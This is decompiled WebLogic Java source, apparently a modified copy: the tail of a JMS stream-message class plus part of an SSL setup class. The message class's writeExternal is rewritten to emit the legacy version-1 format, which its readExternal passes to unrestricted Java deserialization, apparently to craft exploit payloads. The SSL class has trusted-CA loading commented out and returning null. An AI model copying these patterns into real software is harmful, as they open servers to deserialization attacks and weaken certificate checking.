var2 = ". Previous attempt to read bytes from the stream message is not complete. As per the JMS standard, if the readBytes method does not return the value -1, a subsequent readBytes call must be made in order to ensure that there are no more bytes left to be read in. For more information, see the JMS API doc for the method readBytes in interface StreamMessage";
}
throw new MessageFormatException(this.streamConversionError(this.typeCodeToString(var1), this.typeCodeToString(7)) + var2);
case 6:
return (long) this.bdis.readInt();
case 7:
return this.bdis.readLong();
case 8:
return (long) this.bdis.readShort();
case 9:
case 10:
this.bdis.mark();
return Long.parseLong(this.readStringInternal(var1));
}
} catch (EOFException var3) {
throw new weblogic.jms.common.MessageEOFException(this.readPastEnd(), var3);
} catch (IOException var4) {
throw new weblogic.jms.common.JMSException(this.streamReadError(), var4);
} catch (NumberFormatException var5) {
this.bdis.backToMark();
this.bdis.unput();
throw var5;
}
}
public float readFloat() throws JMSException {
byte var1 = this.readType();
try {
switch (var1) {
case 5:
return this.bdis.readFloat();
case 9:
case 10:
this.bdis.mark();
return Float.parseFloat(this.readStringInternal(var1));
default:
this.putTypeBack();
String var2 = "";
if (this.readingByteArray) {
var2 = ". Previous attempt to read bytes from the stream message is not complete. As per the JMS standard, if the readBytes method does not return the value -1, a subsequent readBytes call must be made in order to ensure that there are no more bytes left to be read in. For more information, see the JMS API doc for the method readBytes in interface StreamMessage";
}
throw new MessageFormatException(this.streamConversionError(this.typeCodeToString(var1), this.typeCodeToString(5)) + var2);
}
} catch (EOFException var3) {
throw new weblogic.jms.common.MessageEOFException(this.readPastEnd(), var3);
} catch (IOException var4) {
throw new weblogic.jms.common.JMSException(this.streamReadError(), var4);
} catch (NumberFormatException var5) {
this.bdis.backToMark();
this.bdis.unput();
throw var5;
}
}
public double readDouble() throws JMSException {
byte var1 = this.readType();
try {
switch (var1) {
case 4:
return this.bdis.readDouble();
case 5:
return (double) this.bdis.readFloat();
case 6:
case 7:
case 8:
default:
this.putTypeBack();
String var2 = "";
if (this.readingByteArray) {
var2 = ". Previous attempt to read bytes from the stream message is not complete. As per the JMS standard, if the readBytes method does not return the value -1, a subsequent readBytes call must be made in order to ensure that there are no more bytes left to be read in. For more information, see the JMS API doc for the method readBytes in interface StreamMessage";
}
throw new MessageFormatException(this.streamConversionError(this.typeCodeToString(var1), this.typeCodeToString(4)) + var2);
case 9:
case 10:
this.bdis.mark();
return Double.parseDouble(this.readStringInternal(var1));
}
} catch (EOFException var3) {
throw new weblogic.jms.common.MessageEOFException(this.readPastEnd(), var3);
} catch (IOException var4) {
throw new weblogic.jms.common.JMSException(this.streamReadError(), var4);
} catch (NumberFormatException var5) {
this.bdis.backToMark();
this.bdis.unput();
throw var5;
}
}
public String readString() throws JMSException {
byte var1 = this.readType();
try {
switch (var1) {
case 1:
return String.valueOf(this.bdis.readBoolean());
case 2:
return String.valueOf(this.bdis.readByte());
case 3:
return String.valueOf(this.bdis.readChar());
case 4:
return String.valueOf(this.bdis.readDouble());
case 5:
return String.valueOf(this.bdis.readFloat());
case 6:
return String.valueOf(this.bdis.readInt());
case 7:
return String.valueOf(this.bdis.readLong());
case 8:
return String.valueOf(this.bdis.readShort());
case 9:
return this.readStringInternal(var1);
case 10:
return this.readStringInternal(var1);
case 11:
default:
this.putTypeBack();
String var2 = "";
if (this.readingByteArray) {
var2 = ". Previous attempt to read bytes from the stream message is not complete. As per the JMS standard, if the readBytes method does not return the value -1, a subsequent readBytes call must be made in order to ensure that there are no more bytes left to be read in. For more information, see the JMS API doc for the method readBytes in interface StreamMessage";
}
throw new MessageFormatException(this.streamConversionError(this.typeCodeToString(var1), this.typeCodeToString(9)) + var2);
case 12:
return null;
}
} catch (EOFException var3) {
throw new weblogic.jms.common.MessageEOFException(this.readPastEnd(), var3);
} catch (IOException var4) {
throw new weblogic.jms.common.JMSException(this.streamReadError(), var4);
}
}
public int readBytes(byte[] var1) throws JMSException {
boolean var3 = true;
if (var1 == null) {
throw new NullPointerException();
} else {
try {
if (!this.readingByteArray) {
byte var2;
if ((var2 = this.readType()) != 11) {
if (var2 == 12) {
return -1;
}
this.bdis.unput();
throw new MessageFormatException(this.streamConversionError(this.typeCodeToString(var2), this.typeCodeToString(11)));
}
this.available_bytes = this.bdis.readInt();
if (this.available_bytes == 0) {
return 0;
}
this.readingByteArray = true;
}
if (this.available_bytes == 0) {
this.readingByteArray = false;
return -1;
} else {
int var9;
if (var1.length > this.available_bytes) {
var9 = this.bdis.read(var1, 0, this.available_bytes);
this.readingByteArray = false;
} else {
var9 = this.bdis.read(var1, 0, var1.length);
this.available_bytes -= var1.length;
}
return var9;
}
} catch (EOFException var5) {
throw new weblogic.jms.common.MessageEOFException(this.readPastEnd(), var5);
} catch (IOException var6) {
throw new weblogic.jms.common.JMSException(this.streamReadError(), var6);
} catch (ArrayIndexOutOfBoundsException var7) {
throw new weblogic.jms.common.JMSException(JMSClientExceptionLogger.logStreamReadErrorIndexLoggable().getMessage(), var7);
} catch (ArrayStoreException var8) {
throw new weblogic.jms.common.JMSException(JMSClientExceptionLogger.logStreamReadErrorStoreLoggable().getMessage(), var8);
}
}
}
public Object readObject() throws JMSException {
byte var1 = this.readType();
try {
switch (var1) {
case 1:
return new Boolean(this.bdis.readBoolean());
case 2:
return new Byte(this.bdis.readByte());
case 3:
return new Character(this.bdis.readChar());
case 4:
return new Double(this.bdis.readDouble());
case 5:
return new Float(this.bdis.readFloat());
case 6:
return new Integer(this.bdis.readInt());
case 7:
return new Long(this.bdis.readLong());
case 8:
return new Short(this.bdis.readShort());
case 9:
return this.readStringInternal(var1);
case 10:
return this.readStringInternal(var1);
case 11:
if (this.readingByteArray) {
throw new MessageFormatException("Can not read next data. Previous attempt to read bytes from the stream message is not complete. As per the JMS standard, if the readBytes method does not return the value -1, a subsequent readBytes call must be made in order to ensure that there are no more bytes left to be read in. For more information, see the JMS API doc for the method readBytes in interface StreamMessage");
} else {
int var2 = this.bdis.readInt();
byte[] var3 = new byte[var2];
int var4 = this.bdis.read(var3, 0, var2);
if (var4 != var2) {
throw new EOFException("");
}
return var3;
}
case 12:
return null;
default:
this.bdis.unput();
throw new MessageFormatException(this.streamConversionError(this.typeCodeToString(var1), "Object"));
}
} catch (EOFException var5) {
throw new weblogic.jms.common.MessageEOFException(this.readPastEnd(), var5);
} catch (IOException var6) {
throw new weblogic.jms.common.JMSException(this.streamReadError(), var6);
}
}
public void writeBoolean(boolean var1) throws JMSException {
this.writeType((byte) 1);
try {
this.bdos.writeBoolean(var1);
} catch (IOException var3) {
throw new weblogic.jms.common.JMSException(this.streamWriteError(), var3);
}
}
public void writeByte(byte var1) throws JMSException {
this.writeType((byte) 2);
try {
this.bdos.writeByte(var1);
} catch (IOException var3) {
throw new weblogic.jms.common.JMSException(this.streamWriteError(), var3);
}
}
public void writeShort(short var1) throws JMSException {
this.writeType((byte) 8);
try {
this.bdos.writeShort(var1);
} catch (IOException var3) {
throw new weblogic.jms.common.JMSException(this.streamWriteError(), var3);
}
}
public void writeChar(char var1) throws JMSException {
this.writeType((byte) 3);
try {
this.bdos.writeChar(var1);
} catch (IOException var3) {
throw new weblogic.jms.common.JMSException(this.streamWriteError(), var3);
}
}
public void writeInt(int var1) throws JMSException {
this.writeType((byte) 6);
try {
this.bdos.writeInt(var1);
} catch (IOException var3) {
throw new weblogic.jms.common.JMSException(this.streamWriteError(), var3);
}
}
public void writeLong(long var1) throws JMSException {
this.writeType((byte) 7);
try {
this.bdos.writeLong(var1);
} catch (IOException var4) {
throw new weblogic.jms.common.JMSException(this.streamWriteError(), var4);
}
}
public void writeFloat(float var1) throws JMSException {
this.writeType((byte) 5);
try {
this.bdos.writeFloat(var1);
} catch (IOException var3) {
throw new weblogic.jms.common.JMSException(this.streamWriteError(), var3);
}
}
public void writeDouble(double var1) throws JMSException {
this.writeType((byte) 4);
try {
this.bdos.writeDouble(var1);
} catch (IOException var4) {
throw new weblogic.jms.common.JMSException(this.streamWriteError(), var4);
}
}
public void writeString(String var1) throws JMSException {
if (var1 == null) {
this.writeType((byte) 12);
} else {
try {
this.writeStringInternal(var1);
} catch (IOException var3) {
throw new weblogic.jms.common.JMSException(this.streamWriteError(), var3);
}
}
}
public void writeBytes(byte[] var1) throws JMSException {
this.writeBytes(var1, 0, var1.length);
}
public void writeBytes(byte[] var1, int var2, int var3) throws JMSException {
if (var1 == null) {
throw new NullPointerException();
} else {
this.writeType((byte) 11);
try {
this.bdos.writeInt(var3);
this.bdos.write(var1, var2, var3);
} catch (IOException var5) {
throw new weblogic.jms.common.JMSException(this.streamWriteError(), var5);
}
}
}
public void writeObject(Object var1) throws JMSException {
if (var1 instanceof Boolean) {
this.writeBoolean(((Boolean) var1).booleanValue());
} else if (var1 instanceof Number) {
if (var1 instanceof Byte) {
this.writeByte(((Byte) var1).byteValue());
} else if (var1 instanceof Double) {
this.writeDouble(((Double) var1).doubleValue());
} else if (var1 instanceof Float) {
this.writeFloat(((Float) var1).floatValue());
} else if (var1 instanceof Integer) {
this.writeInt(((Integer) var1).intValue());
} else if (var1 instanceof Long) {
this.writeLong(((Long) var1).longValue());
} else if (var1 instanceof Short) {
this.writeShort(((Short) var1).shortValue());
}
} else if (var1 instanceof Character) {
this.writeChar(((Character) var1).charValue());
} else if (var1 instanceof String) {
this.writeString((String) var1);
} else if (var1 instanceof byte[]) {
this.writeBytes((byte[]) ((byte[]) var1));
} else {
if (var1 != null) {
throw new MessageFormatException("Invalid Type: " + var1.getClass().getName());
}
this.writeType((byte) 12);
}
}
public void reset() throws JMSException {
this.setBodyWritable(false);
if (this.bdis != null) {
this.bdis.reset();
} else if (this.bdos != null) {
this.buffer = this.bdos.getBuffer();
this.length = this.bdos.size();
this.bdos = null;
}
this.copyOnWrite = false;
}
public MessageImpl copy() throws JMSException {
StreamMessageImpl var1 = new StreamMessageImpl();
super.copy(var1);
if (this.bdos != null) {
var1.buffer = this.bdos.getBuffer();
var1.length = this.bdos.size();
this.copyOnWrite = true;
} else {
var1.buffer = this.buffer;
var1.length = this.length;
}
var1.setBodyWritable(false);
var1.setPropertiesWritable(false);
return var1;
}
private void checkWritable() throws JMSException {
super.writeMode();
if (this.bdos == null) {
this.bdos = new BufferDataOutputStream((ObjectIOBypass) null, 256);
} else if (this.copyOnWrite) {
this.bdos.copyBuffer();
this.copyOnWrite = false;
}
}
private void checkReadable() throws JMSException {
super.readMode();
if (this.buffer != null && this.length != 0) {
if (this.bdis == null) {
this.bdis = new BufferDataInputStream((ObjectIOBypass) null, this.buffer, 0, this.length);
}
} else {
throw new weblogic.jms.common.MessageEOFException(this.readPastEnd());
}
}
public String toString() {
return "StreamMessage[" + this.getJMSMessageID() + "]";
}
public void writeExternal(ObjectOutput paramObjectOutput) throws IOException {
super.writeExternal(paramObjectOutput);
paramObjectOutput.writeByte(1);
paramObjectOutput.writeInt(getDataSize());
paramObjectOutput.write(getDataBuffer());
// super.writeExternal(var1);
// int var3 = 2147483647;
// ObjectOutput var2;
// if(var1 instanceof JMSObjectOutputWrapper) {
// var3 = ((JMSObjectOutputWrapper)var1).getCompressionThreshold();
// var2 = ((JMSObjectOutputWrapper)var1).getInnerObjectOutput();
// } else {
// var2 = var1;
// }
//
// byte var4;
// if(this.getVersion(var2) >= 30) {
// var4 = (byte)(3 | (this.shouldCompress(var2, var3)?-128:0));
// } else {
// var4 = 2;
// }
//
// var2.writeByte(var4);
// byte[] var5;
// int var6;
// if(this.bdos != null) {
// var5 = this.bdos.getBuffer();
// var6 = this.bdos.size();
// } else {
// var5 = this.buffer;
// var6 = this.length;
// }
//
// if(this.isCompressed()) {
// if(var4 == 2) {
// byte[] var7 = this.decompress();
// var2.writeInt(var7.length);
// var2.write(var7, 0, var7.length);
// } else {
// this.flushCompressedMessageBody(var2);
// }
// } else if((var4 & -128) != 0) {
// this.compressByteArray(var2, var5, var6);
// } else if(var5 != null && var6 != 0) {
// var2.writeInt(var6);
// var2.write(var5, 0, var6);
// } else {
// var2.writeInt(0);
// }
}
public final void decompressMessageBody() throws JMSException {
if (this.isCompressed()) {
try {
this.buffer = this.decompress();
this.length = this.buffer.length;
} catch (IOException var6) {
throw new weblogic.jms.common.JMSException(JMSClientExceptionLogger.logErrorDecompressMessageBodyLoggable().getMessage(), var6);
} finally {
this.cleanupCompressedMessageBody();
}
}
}
public void readExternal(ObjectInput var1) throws IOException, ClassNotFoundException {
super.readExternal(var1);
byte var2 = var1.readByte();
byte var3 = (byte) (var2 & 127);
if (var3 >= 1 && var3 <= 3) {
switch (var3) {
case 1:
this.length = var1.readInt();
this.buffer = new byte[this.length];
var1.readFully(this.buffer);
ByteArrayInputStream var4 = new ByteArrayInputStream(this.buffer);
ObjectInputStream var5 = new ObjectInputStream(var4);
this.setBodyWritable(true);
this.setPropertiesWritable(true);
try {
while (true) {
this.writeObject(var5.readObject());
}
} catch (EOFException var9) {
try {
this.reset();
this.setPropertiesWritable(false);
byte[] var7 = new byte[this.length];
System.arraycopy(this.buffer, 0, var7, 0, this.length);
this.buffer = var7;
} catch (JMSException var8) {
JMSClientExceptionLogger.logStackTrace(var8);
}
} catch (MessageNotWriteableException var10) {
JMSClientExceptionLogger.logStackTrace(var10);
} catch (javax.jms.MessageFormatException var11) {
JMSClientExceptionLogger.logStackTrace(var11);
} catch (JMSException var12) {
JMSClientExceptionLogger.logStackTrace(var12);
}
break;
case 3:
if ((var2 & -128) != 0) {
this.saveCompressedMessageBody(var1);
break;
}
case 2:
if ((this.length = var1.readInt()) > 0) {
this.buffer = new byte[this.length];
var1.readFully(this.buffer);
}
}
} else {
throw JMSUtilities.versionIOException(var3, 1, 3);
}
}
public long getPayloadSize() {
return this.isCompressed() ? (long) this.getCompressedMessageBodySize() : (super.bodySize != -1L ? super.bodySize : (this.buffer != null ? (super.bodySize = (long) this.length) : (this.bdos != null ? (long) this.bdos.size() : (super.bodySize = 0L))));
}
private String typeCodeToString(int var1) {
try {
return TYPE_CODE_STRINGS[var1];
} catch (Throwable var3) {
return TYPE_CODE_STRINGS[0];
}
}
private void writeStringInternal(String var1) throws IOException, JMSException {
if (var1.length() > 20000) {
this.writeType((byte) 10);
this.bdos.writeUTF32(var1);
} else {
this.writeType((byte) 9);
this.bdos.writeUTF(var1);
}
}
private String readStringInternal(byte var1) throws IOException {
return var1 == 10 ? this.bdis.readUTF32() : this.bdis.readUTF();
}
public final byte[] getDataBuffer() {
return this.bdos != null ? this.bdos.getBuffer() : this.buffer;
}
public final int getDataSize() {
return this.bdos != null ? this.bdos.size() : this.length;
}
public final void setDataBuffer(byte[] var1, int var2) {
this.buffer = var1;
this.length = var2;
}
public byte[] getMessageBody(int[] var1) throws JMSException {
if (!this.isCompressed()) {
var1[0] = this.getDataSize();
return this.getDataBuffer();
} else {
try {
byte[] var2 = this.decompress();
var1[0] = var2.length;
return var2;
} catch (IOException var3) {
throw new weblogic.jms.common.JMSException(JMSClientExceptionLogger.logErrorDecompressMessageBodyLoggable().getMessage(), var3);
}
}
}
}
================================================
FILE: src/weblogic/security/utils/SSLSetup.java
================================================
//
// Source code recreated from a .class file by IntelliJ IDEA
// (powered by Fernflower decompiler)
//
package weblogic.security.utils;
import java.io.FileInputStream;
import java.io.InputStream;
import java.net.InetAddress;
import java.net.SocketException;
import java.security.AccessController;
import java.security.KeyManagementException;
import java.security.KeyStore;
import java.security.PrivateKey;
import java.security.cert.CertificateException;
import java.security.cert.CertificateFactory;
import java.security.cert.X509Certificate;
import java.util.ArrayList;
import java.util.Properties;
import javax.net.ssl.SSLSession;
import javax.net.ssl.SSLSocket;
import weblogic.kernel.Kernel;
import weblogic.logging.Loggable;
import weblogic.management.configuration.ServerMBean;
import weblogic.management.provider.CommandLine;
import weblogic.management.provider.ManagementService;
import weblogic.security.SecurityLogger;
import weblogic.security.SSL.HostnameVerifier;
import weblogic.security.SSL.SSLClientInfo;
import weblogic.security.SSL.TrustManager;
import weblogic.security.acl.internal.AuthenticatedSubject;
import weblogic.security.service.PrivilegedActions;
import weblogic.security.service.SecurityServiceManager;
public final class SSLSetup extends SSLSetupLogging {
public static final int STANDARD_IO = 0;
public static final int MUXING_IO = 1;
public static final int LICENSE_NOT_CHECKED = -1;
public static final int LICENSE_NONE = 0;
public static final int LICENSE_DOMESTIC = 1;
public static final int LICENSE_EXPORT = 2;
private static final AuthenticatedSubject kernelId = (AuthenticatedSubject)AccessController.doPrivileged(PrivilegedActions.getKernelIdentityAction());
public static final String FAILURE_DETAILS = "weblogic.security.ssl.failureDetails";
private static boolean ioModelAccessed = false;
private static int ioModel = 0;
private static int licenseLevel = -1;
private static int debugLevel = 0;
private static boolean protocolVersionChecked = false;
private static int protocolVersion = 3;
private static boolean enforceConstraintsChecked = false;
private static int enforceConstraints = 1;
private static final String CERTICOM_DELEGATE = "com.bea.sslplus.CerticomSSLContext";
private static final String RSA_DELEGATE = "com.rsa.ssl.WeblogicContextWrapper";
private static Class sslDelegateClass = null;
public SSLSetup() {
}
public static synchronized int getLicenseLevel() {
if(licenseLevel > -1) {
return licenseLevel;
} else {
licenseLevel = 1;
String var0 = "com.bea.sslplus.CerticomSSLContext";
info("Use Certicom SSL with Domestic strength");
setSSLDelegate(var0);
return licenseLevel;
}
}
public static synchronized void initForServer() {
setIOModel(1);
info("Enabled muxing IO for SSL in server");
}
private static void setSSLDelegate(String var0) {
try {
sslDelegateClass = Class.forName(var0);
if(!SSLContextDelegate.class.isAssignableFrom(sslDelegateClass)) {
String var1 = "Cannot initialize SSL implementation. " + var0 + " does not implement " + SSLContextDelegate.class.getName();
throw new IllegalArgumentException(var1);
}
} catch (ClassNotFoundException var3) {
String var2 = SecurityLogger.getClassNotFound(var0);
throw new IllegalArgumentException(var2, var3);
}
}
static SSLContextDelegate getSSLDelegateInstance() {
if(licenseLevel == -1) {
getLicenseLevel();
}
String var1;
// return new SSLContextDelegateImpl();
try {
return (SSLContextDelegate)sslDelegateClass.newInstance();
} catch (IllegalAccessException var2) {
var1 = SecurityLogger.getIllegalAccessOnContextWrapper(sslDelegateClass.getName());
throw new RuntimeException(var1, var2);
} catch (InstantiationException var3) {
var1 = SecurityLogger.getInstantiationExcOnContextWrapper(sslDelegateClass.getName());
throw new RuntimeException(var1, var3);
}
}
public static int getIOModel() {
ioModelAccessed = true;
return ioModel;
}
public static boolean logSSLRejections() {
if(Kernel.isApplet()) {
return false;
} else if(!Kernel.isServer()) {
return true;
} else {
try {
return ManagementService.getRuntimeAccess(kernelId).getServer().getSSL().isSSLRejectionLoggingEnabled();
} catch (Exception var1) {
info(var1, "Caught exception in SSLSetup.logSSLRejections");
return false;
}
}
}
public static void setIOModel(int var0) {
if(var0 != 0 && var0 != 1) {
debug(2, "Attempt to change SSL IO model to invalid setting");
} else if(ioModelAccessed) {
debug(2, "Attempt to change SSL IO model after access");
} else {
ioModel = var0;
}
}
public static int getProtocolVersion() {
if(!protocolVersionChecked) {
try {
String var0 = CommandLine.getCommandLine().getSSLVersion();
if(var0 != null) {
if(var0.equalsIgnoreCase("SSL3")) {
protocolVersion = 1;
} else if(var0.equalsIgnoreCase("TLS1")) {
protocolVersion = 0;
} else if(var0.equalsIgnoreCase("ALL")) {
protocolVersion = 3;
}
}
} catch (SecurityException var1) {
;
}
protocolVersionChecked = true;
}
return protocolVersion;
}
public static int getEnforceConstraints() {
if(!enforceConstraintsChecked) {
try {
String var0 = CommandLine.getCommandLine().getSSLEnforcementConstraint();
if(var0 != null) {
if(!var0.equalsIgnoreCase("off") && !var0.equalsIgnoreCase("false")) {
if(!var0.equalsIgnoreCase("strong") && !var0.equalsIgnoreCase("true")) {
if(var0.equalsIgnoreCase("strict")) {
enforceConstraints = 2;
}
} else {
enforceConstraints = 1;
}
} else {
enforceConstraints = 0;
}
}
} catch (SecurityException var1) {
;
}
enforceConstraintsChecked = true;
}
return enforceConstraints;
}
public static SSLContextWrapper getSSLContext() throws SocketException {
return getSSLContext((SSLClientInfo)null);
}
public static SSLContextWrapper getSSLContext(SSLClientInfo var0) throws SocketException {
SSLContextWrapper var1 = SSLContextWrapper.getInstance();
if(!Kernel.isApplet()) {
X509Certificate[] var2 = getTrustedCAs(var1);
if(var2 != null) {
try {
var1.addTrustedCA(var2);
} catch (Exception var4) {
debug(2, var4, "Failure loading trusted CA list");
}
}
}
// if(var0 != null) {
// applyInfo(var1, var0);
// }
return var1;
}
private static void applyInfo(SSLContextWrapper var0, SSLClientInfo var1) throws SocketException {
// InputStream[] var2 = var1.getSSLClientCertificate();
// if(var2 != null && var2.length >= 2) {
// info("clientInfo has old style certificate and key");
//
// try {
// String var3 = var1.getSSLClientKeyPassword();
// char[] var4 = null;
// if(var3 != null) {
// var4 = var3.toCharArray();
// }
//
// PrivateKey var5 = var0.inputPrivateKey(var2[0], var4);
// X509Certificate[] var6 = new X509Certificate[var2.length - 1];
// CertificateFactory var7 = CertificateFactory.getInstance("X.509");
//
// for(int var8 = 1; var8 < var2.length; ++var8) {
// var6[var8 - 1] = (X509Certificate)var7.generateCertificate(var2[var8]);
// }
//
// var0.addIdentity(var6, var5);
// info("client identity added");
// } catch (KeyManagementException var9) {
// info(var9, "Problem accessing private key");
// throw new SocketException(SecurityLogger.getProblemAccessingPrivateKey());
// } catch (CertificateException var10) {
// info(var10, "Problem with certificate chain");
// throw new SocketException(SecurityLogger.getProblemWithCertificateChain(var10.getMessage()));
// }
// }
//
// X509Certificate[] var11 = (X509Certificate[])var1.getClientLocalIdentityCert();
// PrivateKey var12 = var1.getClientLocalIdentityKey();
// if(var11 != null && var12 != null) {
// info("clientInfo has new style certificate and key");
// var0.addIdentity(var11, var12);
// }
//
// TrustManager var13 = var1.getTrustManager();
// if(var13 != null) {
// info("clientInfo has programmatic TrustManager");
// var0.getTrustManager().setTrustManager(var13);
// }
//
// byte[][] var14 = var1.getRootCAfingerprints();
// if(var14 != null) {
// info("Adding legacy rootCA fingerprints");
// var0.getTrustManager().setRootCAFingerPrints(var14);
// }
//
// HostnameVerifier var15 = var1.getHostnameVerifier();
// if(var15 != null) {
// info("clientInfo has HostnameVerifier");
// var0.getHostnameVerifier().setHostnameVerifier(var15);
// }
//
// String var16 = var1.getExpectedName();
// if(var16 != null) {
// info("clientInfo has expectedName");
// var0.getHostnameVerifier().setExpectedName(var16);
// }
}
private static X509Certificate[] getTrustedCAs(SSLContextWrapper var0) {
// X509Certificate[] var1 = null;
// String var2;
// KeyStoreInfo[] var3;
// if(!Kernel.isServer()) {
// var2 = CommandLine.getCommandLine().getSSLTrustCA();
// var3 = var2 != null?new KeyStoreInfo[]{new KeyStoreInfo(var2, "jks", (String)null)}:(new KeyStoreConfigurationHelper(ClientKeyStoreConfiguration.getInstance())).getTrustKeyStores();
// ArrayList var4 = new ArrayList();
//
// for(int var5 = 0; var3 != null && var5 < var3.length; ++var5) {
// info("Trusted CA keystore: " + var3[var5].getFileName());
//
// try {
// KeyStore var6 = KeyStore.getInstance(var3[var5].getType());
// FileInputStream var7 = new FileInputStream(var3[var5].getFileName());
// var6.load(var7, (char[])null);
// var4.addAll(SSLCertUtility.getX509Certificates(var6));
// var7.close();
// } catch (Exception var9) {
// debug(2, var9, "Failure loading trusted CA list from: " + var3[var5].getFileName());
// }
// }
//
// var1 = (X509Certificate[])((X509Certificate[])var4.toArray(new X509Certificate[var4.size()]));
// } else {
// info("SSLSetup: loading trusted CA certificates");
// if(SecurityServiceManager.isSecurityServiceInitialized()) {
// try {
// var1 = SSLContextManager.getServerTrustedCAs();
// } catch (Exception var8) {
// debug("Failed to load server trusted CAs", var8);
// }
// } else {
// debug(2, "SSLSetup: using pre-mbean command line configuration for SSL trust");
// var2 = CommandLine.getCommandLine().getSSLTrustCA();
// var3 = var2 != null?new KeyStoreInfo[]{new KeyStoreInfo(var2, "jks", (String)null)}:(new KeyStoreConfigurationHelper(PreMBeanKeyStoreConfiguration.getInstance())).getTrustKeyStores();
// var1 = SSLContextManager.getTrustedCAs(var3);
// }
// }
//
// return var1 != null && var1.length != 0?var1:null;
return null;
}
public static void setFailureDetails(SSLSession var0, String var1) {
var0.putValue("weblogic.security.ssl.failureDetails", var1);
}
public static String getFailureDetails(SSLSession var0) {
return (String)var0.getValue("weblogic.security.ssl.failureDetails");
}
public static void logPlaintextProtocolClientError(SSLSocket var0, String var1) {
String var2 = getPeerName(var0);
debug(2, "Connection to SSL port was made from " + var2 + " using plaintext protocol: " + var1);
if(logSSLRejections()) {
Loggable var3 = SecurityLogger.logPlaintextProtocolClientErrorLoggable(var1, var2);
var3.log();
setFailureDetails(var0.getSession(), var3.getMessage());
}
}
public static void logProtocolVersionError(SSLSocket var0) {
String var1 = getPeerName(var0);
debug(2, "Connection to SSL port from " + var1 + " appears to be either unknown SSL version or maybe is plaintext");
if(logSSLRejections()) {
Loggable var2 = SecurityLogger.logProtocolVersionErrorLoggable(var1);
var2.log();
setFailureDetails(var0.getSession(), var2.getMessage());
}
}
public static void logCertificateChainConstraintsStrictNonCriticalFailure(SSLSocket var0) {
String var1 = getPeerName(var0);
debug(2, "The certificate chain received from " + var1 + " contained a V3 CA certificate which had basic constraints which were not marked critical, " + "this is being rejected due to the strict enforcement of basic constraints.");
if(logSSLRejections()) {
Loggable var2 = SecurityLogger.logCertificateChainConstraintsStrictNonCriticalFailureLoggable(var1);
var2.log();
setFailureDetails(var0.getSession(), var2.getMessage());
}
}
public static void logCertificateChainMissingConstraintsFailure(SSLSocket var0) {
String var1 = getPeerName(var0);
debug(2, "The certificate chain received from " + var1 + " contained a V3 CA certificate which was missing the basic constraints extension");
if(logSSLRejections()) {
Loggable var2 = SecurityLogger.logCertificateChainMissingConstraintsFailureLoggable(var1);
var2.log();
setFailureDetails(var0.getSession(), var2.getMessage());
}
}
public static void logCertificateChainNotACaConstraintsFailure(SSLSocket var0) {
String var1 = getPeerName(var0);
debug(2, "The certificate chain received from " + var1 + " contained a V3 CA certificate which didn't indicate it really is a CA");
if(logSSLRejections()) {
Loggable var2 = SecurityLogger.logCertificateChainNotACaConstraintsFailureLoggable(var1);
var2.log();
setFailureDetails(var0.getSession(), var2.getMessage());
}
}
public static void logCertificateChainPathLenExceededConstraintsFailure(SSLSocket var0) {
String var1 = getPeerName(var0);
debug(2, "The certificate chain received from " + var1 + " contained a V3 CA certificate which indicated a certificate chain path length in the basic constraints that was exceeded");
if(logSSLRejections()) {
Loggable var2 = SecurityLogger.logCertificateChainPathLenExceededConstraintsFailureLoggable(var1);
var2.log();
setFailureDetails(var0.getSession(), var2.getMessage());
}
}
public static void logCertificateChainConstraintsConversionFailure(SSLSocket var0) {
String var1 = getPeerName(var0);
debug(2, "The certificate chain received from " + var1 + " contained a V3 CA certificate which couldn't be converted to be checked for basic constraints.");
if(logSSLRejections()) {
Loggable var2 = SecurityLogger.logCertificateChainConstraintsConversionFailureLoggable(var1);
var2.log();
setFailureDetails(var0.getSession(), var2.getMessage());
}
}
public static void logCertificateChainUnrecognizedExtensionFailure(SSLSocket var0, String var1) {
String var2 = getPeerName(var0);
debug(2, "The certificate chain received from " + var2 + " contained a V3 certificate with unrecognized critical extension: " + var1);
if(logSSLRejections()) {
Loggable var3 = SecurityLogger.logCertificateChainUnrecognizedExtensionFailureLoggable(var2, var1);
var3.log();
setFailureDetails(var0.getSession(), var3.getMessage());
}
}
public static void logCertificateChainAlgKeyUsageFailure(SSLSocket var0) {
String var1 = getPeerName(var0);
debug(2, "The certificate chain received from " + var1 + " contained a V3 certificate which key usage constraints indicate" + " its key cannot be used in quality required by the key agreement algorithm");
if(logSSLRejections()) {
Loggable var2 = SecurityLogger.logCertificateChainAlgKeyUsageFailureLoggable(var1);
var2.log();
setFailureDetails(var0.getSession(), var2.getMessage());
}
}
public static void logCertificateChainCheckKeyUsageFailure(SSLSocket var0) {
String var1 = getPeerName(var0);
debug(2, "Cannot check key usage constraints of certificate recieved from " + var1 + " because of the failure to determine the key agreement algorithm");
if(logSSLRejections()) {
Loggable var2 = SecurityLogger.logCertificateChainCheckKeyUsageFailureLoggable(var1);
var2.log();
setFailureDetails(var0.getSession(), var2.getMessage());
}
}
public static void logCertificateChainCertSignKeyUsageFailure(SSLSocket var0) {
String var1 = getPeerName(var0);
debug(2, "The certificate chain received from " + var1 + " contained a V3 CA certificate which key usage constraints indicate" + " its key cannot be used to sign certificates");
if(logSSLRejections()) {
Loggable var2 = SecurityLogger.logCertificateChainCertSignKeyUsageFailureLoggable(var1);
var2.log();
setFailureDetails(var0.getSession(), var2.getMessage());
}
}
public static void logCertificatePolicyIdDoesntExistIntheList(SSLSocket var0, String var1) {
String var2 = getPeerName(var0);
debug(2, "Certificate Policies Extension Processing Failed,PolicyId: " + var1 + " doesn't Exist in the allowed list");
if(logSSLRejections()) {
Loggable var3 = SecurityLogger.logCertificatePolicyIdDoesntExistIntheListLoggable(var1);
var3.log();
setFailureDetails(var0.getSession(), var3.getMessage());
}
}
public static void logPolicyQualifierIdNotCPS(SSLSocket var0, String var1) {
String var2 = getPeerName(var0);
debug(2, "PolicyQualifier Id Found in the Certificate" + var1 + " doesn't match with CPS Qualifier Id");
if(logSSLRejections()) {
Loggable var3 = SecurityLogger.logPolicyQualifierIdNotCPSLoggable(var1);
var3.log();
setFailureDetails(var0.getSession(), var3.getMessage());
}
}
public static String getPeerName(SSLSocket var0) {
String var1 = "unknown";
if(var0 != null) {
InetAddress var2 = var0.getInetAddress();
if(var2 != null) {
try {
var1 = var2.getHostName() + " - " + var2.getHostAddress();
} catch (SecurityException var4) {
var1 = var2.getHostAddress();
}
if(var1 == null) {
var1 = var2.toString();
}
}
}
return var1;
}
public static void logAlertReceivedFromPeer(SSLSocket var0, int var1) {
if(logSSLRejections() && var1 != 0 && var1 != 90) {
String var2 = getPeerName(var0);
Loggable var3 = null;
switch(var1) {
case 10:
var3 = SecurityLogger.logUnexpectedMessageAlertReceivedFromPeerLoggable(var2);
